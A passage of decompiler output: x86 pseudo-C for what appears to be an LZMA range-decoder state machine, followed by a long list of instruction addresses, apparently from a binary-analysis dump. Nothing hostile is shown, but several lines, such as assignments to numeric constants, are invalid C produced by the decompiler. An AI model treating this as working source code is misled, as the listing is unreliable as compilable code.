                                                                                  												__ebx = _t217;
                                                                                  												__cx = __ax >> 5;
                                                                                  												__eflags = __eax;
                                                                                  												 *__esi = __ax;
                                                                                  											} else {
                                                                                  												 *(__ebp - 0x10) = __ecx;
                                                                                  												0x800 = 0x800 - __edi;
                                                                                  												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                  												__ebx = __ebx + __ebx;
                                                                                  												 *__esi = __cx;
                                                                                  											}
                                                                                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                  											 *(__ebp - 0x44) = __ebx;
                                                                                  											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                  												goto L60;
                                                                                  											} else {
                                                                                  												L65:
                                                                                  												goto L58;
                                                                                  											}
                                                                                  										case 0x10:
                                                                                  											L109:
                                                                                  											__eflags =  *(__ebp - 0x6c);
                                                                                  											if( *(__ebp - 0x6c) == 0) {
                                                                                  												L165:
                                                                                  												 *(__ebp - 0x88) = 0x10;
                                                                                  												goto L170;
                                                                                  											}
                                                                                  											L110:
                                                                                  											__ecx =  *(__ebp - 0x70);
                                                                                  											__eax =  *(__ebp - 0xc);
                                                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											_t365 = __ebp - 0x70;
                                                                                  											 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                  											__eflags =  *_t365;
                                                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											goto L111;
                                                                                  										case 0x11:
                                                                                  											L69:
                                                                                  											__esi =  *(__ebp - 0x58);
                                                                                  											 *(__ebp - 0x84) = 0x12;
                                                                                  											goto L132;
                                                                                  										case 0x12:
                                                                                  											L128:
                                                                                  											__eflags =  *(__ebp - 0x40);
                                                                                  											if( *(__ebp - 0x40) != 0) {
                                                                                  												L131:
                                                                                  												__eax =  *(__ebp - 0x58);
                                                                                  												 *(__ebp - 0x84) = 0x13;
                                                                                  												__esi =  *(__ebp - 0x58) + 2;
                                                                                  												L132:
                                                                                  												 *(_t644 - 0x54) = _t642;
                                                                                  												goto L133;
                                                                                  											}
                                                                                  											L129:
                                                                                  											__eax =  *(__ebp - 0x4c);
                                                                                  											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                  											__ecx =  *(__ebp - 0x58);
                                                                                  											__eax =  *(__ebp - 0x4c) << 4;
                                                                                  											__eflags = __eax;
                                                                                  											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                  											goto L130;
                                                                                  										case 0x13:
                                                                                  											L141:
                                                                                  											__eflags =  *(__ebp - 0x40);
                                                                                  											if( *(__ebp - 0x40) != 0) {
                                                                                  												L143:
                                                                                  												_t469 = __ebp - 0x58;
                                                                                  												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                  												__eflags =  *_t469;
                                                                                  												 *(__ebp - 0x30) = 0x10;
                                                                                  												 *(__ebp - 0x40) = 8;
                                                                                  												L144:
                                                                                  												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
                                                                                  												L145:
                                                                                  												 *(_t644 - 0x50) = 1;
                                                                                  												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                                  												goto L149;
                                                                                  											}
                                                                                  											L142:
                                                                                  											__eax =  *(__ebp - 0x4c);
                                                                                  											__ecx =  *(__ebp - 0x58);
                                                                                  											__eax =  *(__ebp - 0x4c) << 4;
                                                                                  											 *(__ebp - 0x30) = 8;
                                                                                  											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                  											L130:
                                                                                  											 *(__ebp - 0x58) = __eax;
                                                                                  											 *(__ebp - 0x40) = 3;
                                                                                  											goto L144;
                                                                                  										case 0x14:
                                                                                  											L156:
                                                                                  											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                  											__eax =  *(__ebp - 0x80);
                                                                                  											while(1) {
                                                                                  												L140:
                                                                                  												 *(_t644 - 0x88) = _t537;
                                                                                  												goto L1;
                                                                                  											}
                                                                                  										case 0x15:
                                                                                  											L91:
                                                                                  											__eax = 0;
                                                                                  											__eflags =  *(__ebp - 0x38) - 7;
                                                                                  											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                  											__al = __al & 0x000000fd;
                                                                                  											__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                  											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                  											goto L120;
                                                                                  										case 0x16:
                                                                                  											goto L0;
                                                                                  										case 0x17:
                                                                                  											while(1) {
                                                                                  												L145:
                                                                                  												 *(_t644 - 0x50) = 1;
                                                                                  												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                                  												goto L149;
                                                                                  											}
                                                                                  										case 0x18:
                                                                                  											goto L146;
                                                                                  										case 0x19:
                                                                                  											L94:
                                                                                  											__eflags = __ebx - 4;
                                                                                  											if(__ebx < 4) {
                                                                                  												L98:
                                                                                  												 *(__ebp - 0x2c) = __ebx;
                                                                                  												L119:
                                                                                  												_t393 = __ebp - 0x2c;
                                                                                  												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                  												__eflags =  *_t393;
                                                                                  												L120:
                                                                                  												__eax =  *(__ebp - 0x2c);
                                                                                  												__eflags = __eax;
                                                                                  												if(__eax == 0) {
                                                                                  													L166:
                                                                                  													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                  													goto L170;
                                                                                  												}
                                                                                  												L121:
                                                                                  												__eflags = __eax -  *(__ebp - 0x60);
                                                                                  												if(__eax >  *(__ebp - 0x60)) {
                                                                                  													goto L171;
                                                                                  												}
                                                                                  												L122:
                                                                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                  												__eax =  *(__ebp - 0x30);
                                                                                  												_t400 = __ebp - 0x60;
                                                                                  												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                  												__eflags =  *_t400;
                                                                                  												goto L123;
                                                                                  											}
                                                                                  											L95:
                                                                                  											__ecx = __ebx;
                                                                                  											__eax = __ebx;
                                                                                  											__ecx = __ebx >> 1;
                                                                                  											__eax = __ebx & 0x00000001;
                                                                                  											__ecx = (__ebx >> 1) - 1;
                                                                                  											__al = __al | 0x00000002;
                                                                                  											__eax = (__ebx & 0x00000001) << __cl;
                                                                                  											__eflags = __ebx - 0xe;
                                                                                  											 *(__ebp - 0x2c) = __eax;
                                                                                  											if(__ebx >= 0xe) {
                                                                                  												L97:
                                                                                  												__ebx = 0;
                                                                                  												 *(__ebp - 0x48) = __ecx;
                                                                                  												L102:
                                                                                  												__eflags =  *(__ebp - 0x48);
                                                                                  												if( *(__ebp - 0x48) <= 0) {
                                                                                  													L107:
                                                                                  													__eax = __eax + __ebx;
                                                                                  													 *(__ebp - 0x40) = 4;
                                                                                  													 *(__ebp - 0x2c) = __eax;
                                                                                  													__eax =  *(__ebp - 4);
                                                                                  													__eax =  *(__ebp - 4) + 0x644;
                                                                                  													__eflags = __eax;
                                                                                  													L108:
                                                                                  													__ebx = 0;
                                                                                  													 *(__ebp - 0x58) = __eax;
                                                                                  													 *(__ebp - 0x50) = 1;
                                                                                  													 *(__ebp - 0x44) = 0;
                                                                                  													 *(__ebp - 0x48) = 0;
                                                                                  													L112:
                                                                                  													__eax =  *(__ebp - 0x40);
                                                                                  													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                  													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                  														L118:
                                                                                  														_t391 = __ebp - 0x2c;
                                                                                  														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                  														__eflags =  *_t391;
                                                                                  														goto L119;
                                                                                  													}
                                                                                  													L113:
                                                                                  													__eax =  *(__ebp - 0x50);
                                                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                  													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                  													__eax =  *(__ebp - 0x58);
                                                                                  													__esi = __edi + __eax;
                                                                                  													 *(__ebp - 0x54) = __esi;
                                                                                  													__ax =  *__esi;
                                                                                  													__ecx = __ax & 0x0000ffff;
                                                                                  													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                  													__eflags =  *(__ebp - 0xc) - __edx;
                                                                                  													if( *(__ebp - 0xc) >= __edx) {
                                                                                  														__ecx = 0;
                                                                                  														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                  														__ecx = 1;
                                                                                  														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                  														__ebx = 1;
                                                                                  														__ecx =  *(__ebp - 0x48);
                                                                                  														__ebx = 1 << __cl;
                                                                                  														__ecx = 1 << __cl;
                                                                                  														__ebx =  *(__ebp - 0x44);
                                                                                  														__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                  														__cx = __ax;
                                                                                  														__cx = __ax >> 5;
                                                                                  														__eax = __eax - __ecx;
                                                                                  														__edi = __edi + 1;
                                                                                  														__eflags = __edi;
                                                                                  														 *(__ebp - 0x44) = __ebx;
                                                                                  														 *__esi = __ax;
                                                                                  														 *(__ebp - 0x50) = __edi;
                                                                                  													} else {
                                                                                  														 *(__ebp - 0x10) = __edx;
                                                                                  														0x800 = 0x800 - __ecx;
                                                                                  														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                  														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                  														 *__esi = __dx;
                                                                                  													}
                                                                                  													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                  													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                  														L111:
                                                                                  														_t368 = __ebp - 0x48;
                                                                                  														 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                  														__eflags =  *_t368;
                                                                                  														goto L112;
                                                                                  													} else {
                                                                                  														L117:
                                                                                  														goto L109;
                                                                                  													}
                                                                                  												}
                                                                                  												L103:
                                                                                  												__ecx =  *(__ebp - 0xc);
                                                                                  												__ebx = __ebx + __ebx;
                                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                  												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                  												 *(__ebp - 0x44) = __ebx;
                                                                                  												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                  													__ecx =  *(__ebp - 0x10);
                                                                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                  													__ebx = __ebx | 0x00000001;
                                                                                  													__eflags = __ebx;
                                                                                  													 *(__ebp - 0x44) = __ebx;
                                                                                  												}
                                                                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                  													L101:
                                                                                  													_t338 = __ebp - 0x48;
                                                                                  													 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                  													__eflags =  *_t338;
                                                                                  													goto L102;
                                                                                  												} else {
                                                                                  													L106:
                                                                                  													goto L99;
                                                                                  												}
                                                                                  											}
                                                                                  											L96:
                                                                                  											__edx =  *(__ebp - 4);
                                                                                  											__eax = __eax - __ebx;
                                                                                  											 *(__ebp - 0x40) = __ecx;
                                                                                  											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                  											goto L108;
                                                                                  										case 0x1a:
                                                                                  											L56:
                                                                                  											__eflags =  *(__ebp - 0x64);
                                                                                  											if( *(__ebp - 0x64) == 0) {
                                                                                  												L162:
                                                                                  												 *(__ebp - 0x88) = 0x1a;
                                                                                  												goto L170;
                                                                                  											}
                                                                                  											L57:
                                                                                  											__ecx =  *(__ebp - 0x68);
                                                                                  											__al =  *(__ebp - 0x5c);
                                                                                  											__edx =  *(__ebp - 8);
                                                                                  											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                  											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                  											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                  											 *( *(__ebp - 0x68)) = __al;
                                                                                  											__ecx =  *(__ebp - 0x14);
                                                                                  											 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                  											__eax = __ecx + 1;
                                                                                  											__edx = 0;
                                                                                  											_t192 = __eax %  *(__ebp - 0x74);
                                                                                  											__eax = __eax /  *(__ebp - 0x74);
                                                                                  											__edx = _t192;
                                                                                  											goto L80;
                                                                                  										case 0x1b:
                                                                                  											L76:
                                                                                  											__eflags =  *(__ebp - 0x64);
                                                                                  											if( *(__ebp - 0x64) == 0) {
                                                                                  												L163:
                                                                                  												 *(__ebp - 0x88) = 0x1b;
                                                                                  												goto L170;
                                                                                  											}
                                                                                  											L77:
                                                                                  											__eax =  *(__ebp - 0x14);
                                                                                  											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                  											__eflags = __eax -  *(__ebp - 0x74);
                                                                                  											if(__eax >=  *(__ebp - 0x74)) {
                                                                                  												__eax = __eax +  *(__ebp - 0x74);
                                                                                  												__eflags = __eax;
                                                                                  											}
                                                                                  											__edx =  *(__ebp - 8);
                                                                                  											__cl =  *(__eax + __edx);
                                                                                  											__eax =  *(__ebp - 0x14);
                                                                                  											 *(__ebp - 0x5c) = __cl;
                                                                                  											 *(__eax + __edx) = __cl;
                                                                                  											__eax = __eax + 1;
                                                                                  											__edx = 0;
                                                                                  											_t275 = __eax %  *(__ebp - 0x74);
                                                                                  											__eax = __eax /  *(__ebp - 0x74);
                                                                                  											__edx = _t275;
                                                                                  											__eax =  *(__ebp - 0x68);
                                                                                  											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                  											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                  											_t284 = __ebp - 0x64;
                                                                                  											 *_t284 =  *(__ebp - 0x64) - 1;
                                                                                  											__eflags =  *_t284;
                                                                                  											 *( *(__ebp - 0x68)) = __cl;
                                                                                  											L80:
                                                                                  											 *(__ebp - 0x14) = __edx;
                                                                                  											goto L81;
                                                                                  										case 0x1c:
                                                                                  											while(1) {
                                                                                  												L123:
                                                                                  												__eflags =  *(__ebp - 0x64);
                                                                                  												if( *(__ebp - 0x64) == 0) {
                                                                                  													break;
                                                                                  												}
                                                                                  												L124:
                                                                                  												__eax =  *(__ebp - 0x14);
                                                                                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                  												__eflags = __eax -  *(__ebp - 0x74);
                                                                                  												if(__eax >=  *(__ebp - 0x74)) {
                                                                                  													__eax = __eax +  *(__ebp - 0x74);
                                                                                  													__eflags = __eax;
                                                                                  												}
                                                                                  												__edx =  *(__ebp - 8);
                                                                                  												__cl =  *(__eax + __edx);
                                                                                  												__eax =  *(__ebp - 0x14);
                                                                                  												 *(__ebp - 0x5c) = __cl;
                                                                                  												 *(__eax + __edx) = __cl;
                                                                                  												__eax = __eax + 1;
                                                                                  												__edx = 0;
                                                                                  												_t414 = __eax %  *(__ebp - 0x74);
                                                                                  												__eax = __eax /  *(__ebp - 0x74);
                                                                                  												__edx = _t414;
                                                                                  												__eax =  *(__ebp - 0x68);
                                                                                  												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                  												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                  												__eflags =  *(__ebp - 0x30);
                                                                                  												 *( *(__ebp - 0x68)) = __cl;
                                                                                  												 *(__ebp - 0x14) = _t414;
                                                                                  												if( *(__ebp - 0x30) > 0) {
                                                                                  													continue;
                                                                                  												} else {
                                                                                  													L127:
                                                                                  													L81:
                                                                                  													 *(__ebp - 0x88) = 2;
                                                                                  													goto L1;
                                                                                  												}
                                                                                  											}
                                                                                  											L167:
                                                                                  											 *(__ebp - 0x88) = 0x1c;
                                                                                  											goto L170;
                                                                                  									}
                                                                                  								}
                                                                                  								L171:
                                                                                  								_t539 = _t538 | 0xffffffff;
                                                                                  								goto L172;
                                                                                  							}
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  			}















                                                                                  0x00407194
                                                                                  0x00407194
                                                                                  0x00407194
                                                                                  0x00407194
                                                                                  0x0040719a
                                                                                  0x0040719e
                                                                                  0x004071a2
                                                                                  0x004071ac
                                                                                  0x004071ba
                                                                                  0x00407490
                                                                                  0x00407490
                                                                                  0x00407493
                                                                                  0x0040749a
                                                                                  0x004074c7
                                                                                  0x004074c7
                                                                                  0x004074cb
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004074cd
                                                                                  0x004074d6
                                                                                  0x004074dc
                                                                                  0x004074df
                                                                                  0x004074e2
                                                                                  0x004074e5
                                                                                  0x004074e8
                                                                                  0x004074ee
                                                                                  0x00407507
                                                                                  0x0040750a
                                                                                  0x00407516
                                                                                  0x00407517
                                                                                  0x0040751a
                                                                                  0x004074f0
                                                                                  0x004074f0
                                                                                  0x004074ff
                                                                                  0x00407502
                                                                                  0x00407502
                                                                                  0x00407524
                                                                                  0x004074c4
                                                                                  0x004074c4
                                                                                  0x004074c4
                                                                                  0x004074c7
                                                                                  0x004074cb
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407526
                                                                                  0x00407526
                                                                                  0x0040749f
                                                                                  0x004074a3
                                                                                  0x004075db
                                                                                  0x004075db
                                                                                  0x004075e5
                                                                                  0x004075ed
                                                                                  0x004075f4
                                                                                  0x004075f6
                                                                                  0x004075fd
                                                                                  0x00407601
                                                                                  0x00407601
                                                                                  0x004074a9
                                                                                  0x004074af
                                                                                  0x004074b6
                                                                                  0x004074be
                                                                                  0x004074be
                                                                                  0x004074c1
                                                                                  0x00000000
                                                                                  0x004074c1
                                                                                  0x0040752b
                                                                                  0x00407538
                                                                                  0x0040753b
                                                                                  0x00407447
                                                                                  0x00407447
                                                                                  0x00407447
                                                                                  0x00406be3
                                                                                  0x00406be3
                                                                                  0x00406be3
                                                                                  0x00406bec
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406bf2
                                                                                  0x00406bf2
                                                                                  0x00000000
                                                                                  0x00406bf9
                                                                                  0x00406bfd
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406c03
                                                                                  0x00406c06
                                                                                  0x00406c09
                                                                                  0x00406c0c
                                                                                  0x00406c10
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406c16
                                                                                  0x00406c16
                                                                                  0x00406c19
                                                                                  0x00406c1b
                                                                                  0x00406c1c
                                                                                  0x00406c1f
                                                                                  0x00406c21
                                                                                  0x00406c22
                                                                                  0x00406c24
                                                                                  0x00406c27
                                                                                  0x00406c2c
                                                                                  0x00406c31
                                                                                  0x00406c3a
                                                                                  0x00406c4d
                                                                                  0x00406c50
                                                                                  0x00406c5c
                                                                                  0x00406c84
                                                                                  0x00406c86
                                                                                  0x00406c94
                                                                                  0x00406c94
                                                                                  0x00406c98
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406c88
                                                                                  0x00406c88
                                                                                  0x00406c8b
                                                                                  0x00406c8c
                                                                                  0x00406c8c
                                                                                  0x00000000
                                                                                  0x00406c88
                                                                                  0x00406c5e
                                                                                  0x00406c62
                                                                                  0x00406c67
                                                                                  0x00406c67
                                                                                  0x00406c70
                                                                                  0x00406c78
                                                                                  0x00406c7b
                                                                                  0x00000000
                                                                                  0x00406c81
                                                                                  0x00406c81
                                                                                  0x00000000
                                                                                  0x00406c81
                                                                                  0x00000000
                                                                                  0x00406c9e
                                                                                  0x00406c9e
                                                                                  0x00406ca2
                                                                                  0x0040754e
                                                                                  0x0040754e
                                                                                  0x00000000
                                                                                  0x0040754e
                                                                                  0x00406ca8
                                                                                  0x00406cab
                                                                                  0x00406cbb
                                                                                  0x00406cbe
                                                                                  0x00406cc1
                                                                                  0x00406cc1
                                                                                  0x00406cc1
                                                                                  0x00406cc4
                                                                                  0x00406cc8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406cca
                                                                                  0x00406cca
                                                                                  0x00406cd0
                                                                                  0x00406cfa
                                                                                  0x00406d00
                                                                                  0x00406d07
                                                                                  0x00000000
                                                                                  0x00406d07
                                                                                  0x00406cd2
                                                                                  0x00406cd6
                                                                                  0x00406cd9
                                                                                  0x00406cde
                                                                                  0x00406cde
                                                                                  0x00406ce9
                                                                                  0x00406cf1
                                                                                  0x00406cf4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406d39
                                                                                  0x00406d3f
                                                                                  0x00406d42
                                                                                  0x00406d4f
                                                                                  0x00406d57
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406d0e
                                                                                  0x00406d0e
                                                                                  0x00406d12
                                                                                  0x0040755d
                                                                                  0x0040755d
                                                                                  0x00000000
                                                                                  0x0040755d
                                                                                  0x00406d18
                                                                                  0x00406d1e
                                                                                  0x00406d29
                                                                                  0x00406d29
                                                                                  0x00406d29
                                                                                  0x00406d2c
                                                                                  0x00406d2f
                                                                                  0x00406d32
                                                                                  0x00406d37
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004073ce
                                                                                  0x004073ce
                                                                                  0x004073d4
                                                                                  0x004073da
                                                                                  0x004073e0
                                                                                  0x004073fa
                                                                                  0x004073fd
                                                                                  0x00407403
                                                                                  0x0040740e
                                                                                  0x0040740e
                                                                                  0x00407410
                                                                                  0x004073e2
                                                                                  0x004073e2
                                                                                  0x004073f1
                                                                                  0x004073f5
                                                                                  0x004073f5
                                                                                  0x0040741a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040741c
                                                                                  0x00407420
                                                                                  0x004075cf
                                                                                  0x004075cf
                                                                                  0x00000000
                                                                                  0x004075cf
                                                                                  0x00407426
                                                                                  0x0040742c
                                                                                  0x00407433
                                                                                  0x0040743b
                                                                                  0x0040743e
                                                                                  0x00407441
                                                                                  0x00407441
                                                                                  0x00407447
                                                                                  0x00407447
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406d5f
                                                                                  0x00406d5f
                                                                                  0x00406d61
                                                                                  0x00406d64
                                                                                  0x00406dd5
                                                                                  0x00406dd5
                                                                                  0x00406dd8
                                                                                  0x00406ddb
                                                                                  0x00406de2
                                                                                  0x00406dec
                                                                                  0x00000000
                                                                                  0x00406dec
                                                                                  0x00406d66
                                                                                  0x00406d66
                                                                                  0x00406d6a
                                                                                  0x00406d6d
                                                                                  0x00406d6f
                                                                                  0x00406d72
                                                                                  0x00406d75
                                                                                  0x00406d77
                                                                                  0x00406d7a
                                                                                  0x00406d7c
                                                                                  0x00406d81
                                                                                  0x00406d84
                                                                                  0x00406d87
                                                                                  0x00406d8b
                                                                                  0x00406d92
                                                                                  0x00406d95
                                                                                  0x00406d9c
                                                                                  0x00406da0
                                                                                  0x00406da8
                                                                                  0x00406da8
                                                                                  0x00406da8
                                                                                  0x00406da2
                                                                                  0x00406da2
                                                                                  0x00406da2
                                                                                  0x00406d97
                                                                                  0x00406d97
                                                                                  0x00406d97
                                                                                  0x00406dac
                                                                                  0x00406daf
                                                                                  0x00406dcd
                                                                                  0x00406dcd
                                                                                  0x00406dcf
                                                                                  0x00000000
                                                                                  0x00406db1
                                                                                  0x00406db1
                                                                                  0x00406db1
                                                                                  0x00406db4
                                                                                  0x00406db7
                                                                                  0x00406dba
                                                                                  0x00406dbc
                                                                                  0x00406dbc
                                                                                  0x00406dbc
                                                                                  0x00406dbf
                                                                                  0x00406dc2
                                                                                  0x00406dc4
                                                                                  0x00406dc5
                                                                                  0x00406dc8
                                                                                  0x00000000
                                                                                  0x00406dc8
                                                                                  0x00000000
                                                                                  0x00406ffe
                                                                                  0x00406ffe
                                                                                  0x00407002
                                                                                  0x00407020
                                                                                  0x00407020
                                                                                  0x00407023
                                                                                  0x0040702a
                                                                                  0x0040702d
                                                                                  0x00407030
                                                                                  0x00407033
                                                                                  0x00407036
                                                                                  0x00407039
                                                                                  0x0040703b
                                                                                  0x00407042
                                                                                  0x00407043
                                                                                  0x00407045
                                                                                  0x00407048
                                                                                  0x0040704b
                                                                                  0x0040704e
                                                                                  0x0040704e
                                                                                  0x00407053
                                                                                  0x00000000
                                                                                  0x00407053
                                                                                  0x00407004
                                                                                  0x00407004
                                                                                  0x00407007
                                                                                  0x0040700a
                                                                                  0x00407014
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407068
                                                                                  0x00407068
                                                                                  0x0040706c
                                                                                  0x0040708f
                                                                                  0x00407092
                                                                                  0x00407095
                                                                                  0x0040709f
                                                                                  0x0040706e
                                                                                  0x0040706e
                                                                                  0x00407071
                                                                                  0x00407074
                                                                                  0x00407077
                                                                                  0x00407084
                                                                                  0x00407087
                                                                                  0x00407087
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004070ab
                                                                                  0x004070ab
                                                                                  0x004070af
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004070b5
                                                                                  0x004070b5
                                                                                  0x004070b9
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004070bf
                                                                                  0x004070bf
                                                                                  0x004070c1
                                                                                  0x004070c5
                                                                                  0x004070c5
                                                                                  0x004070c8
                                                                                  0x004070cc
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040711c
                                                                                  0x0040711c
                                                                                  0x00407120
                                                                                  0x00407127
                                                                                  0x00407127
                                                                                  0x0040712a
                                                                                  0x0040712d
                                                                                  0x00407137
                                                                                  0x00000000
                                                                                  0x00407137
                                                                                  0x00407122
                                                                                  0x00407122
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407143
                                                                                  0x00407143
                                                                                  0x00407147
                                                                                  0x0040714e
                                                                                  0x00407151
                                                                                  0x00407154
                                                                                  0x00407149
                                                                                  0x00407149
                                                                                  0x00407149
                                                                                  0x00407157
                                                                                  0x0040715a
                                                                                  0x0040715d
                                                                                  0x0040715d
                                                                                  0x00407160
                                                                                  0x00407163
                                                                                  0x00407166
                                                                                  0x00407166
                                                                                  0x00407169
                                                                                  0x00407170
                                                                                  0x00407175
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407203
                                                                                  0x00407203
                                                                                  0x00407207
                                                                                  0x004075a5
                                                                                  0x004075a5
                                                                                  0x00000000
                                                                                  0x004075a5
                                                                                  0x0040720d
                                                                                  0x0040720d
                                                                                  0x00407210
                                                                                  0x00407213
                                                                                  0x00407217
                                                                                  0x0040721a
                                                                                  0x00407220
                                                                                  0x00407222
                                                                                  0x00407222
                                                                                  0x00407222
                                                                                  0x00407225
                                                                                  0x00407228
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406df8
                                                                                  0x00406df8
                                                                                  0x00406dfc
                                                                                  0x00407569
                                                                                  0x00407569
                                                                                  0x00000000
                                                                                  0x00407569
                                                                                  0x00406e02
                                                                                  0x00406e02
                                                                                  0x00406e05
                                                                                  0x00406e08
                                                                                  0x00406e0c
                                                                                  0x00406e0f
                                                                                  0x00406e15
                                                                                  0x00406e17
                                                                                  0x00406e17
                                                                                  0x00406e17
                                                                                  0x00406e1a
                                                                                  0x00406e1d
                                                                                  0x00406e1d
                                                                                  0x00406e20
                                                                                  0x00406e23
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406e29
                                                                                  0x00406e29
                                                                                  0x00406e2f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406e35
                                                                                  0x00406e35
                                                                                  0x00406e39
                                                                                  0x00406e3c
                                                                                  0x00406e3f
                                                                                  0x00406e42
                                                                                  0x00406e45
                                                                                  0x00406e46
                                                                                  0x00406e49
                                                                                  0x00406e4b
                                                                                  0x00406e51
                                                                                  0x00406e54
                                                                                  0x00406e57
                                                                                  0x00406e5a
                                                                                  0x00406e5d
                                                                                  0x00406e60
                                                                                  0x00406e63
                                                                                  0x00406e7f
                                                                                  0x00406e82
                                                                                  0x00406e85
                                                                                  0x00406e88
                                                                                  0x00406e8f
                                                                                  0x00406e93
                                                                                  0x00406e95
                                                                                  0x00406e99
                                                                                  0x00406e65
                                                                                  0x00406e65
                                                                                  0x00406e69
                                                                                  0x00406e71
                                                                                  0x00406e76
                                                                                  0x00406e78
                                                                                  0x00406e7a
                                                                                  0x00406e7a
                                                                                  0x00406e9c
                                                                                  0x00406ea3
                                                                                  0x00406ea6
                                                                                  0x00000000
                                                                                  0x00406eac
                                                                                  0x00406eac
                                                                                  0x00000000
                                                                                  0x00406eac
                                                                                  0x00000000
                                                                                  0x00406eb1
                                                                                  0x00406eb1
                                                                                  0x00406eb5
                                                                                  0x00407575
                                                                                  0x00407575
                                                                                  0x00000000
                                                                                  0x00407575
                                                                                  0x00406ebb
                                                                                  0x00406ebb
                                                                                  0x00406ebe
                                                                                  0x00406ec1
                                                                                  0x00406ec5
                                                                                  0x00406ec8
                                                                                  0x00406ece
                                                                                  0x00406ed0
                                                                                  0x00406ed0
                                                                                  0x00406ed0
                                                                                  0x00406ed3
                                                                                  0x00406ed6
                                                                                  0x00406ed6
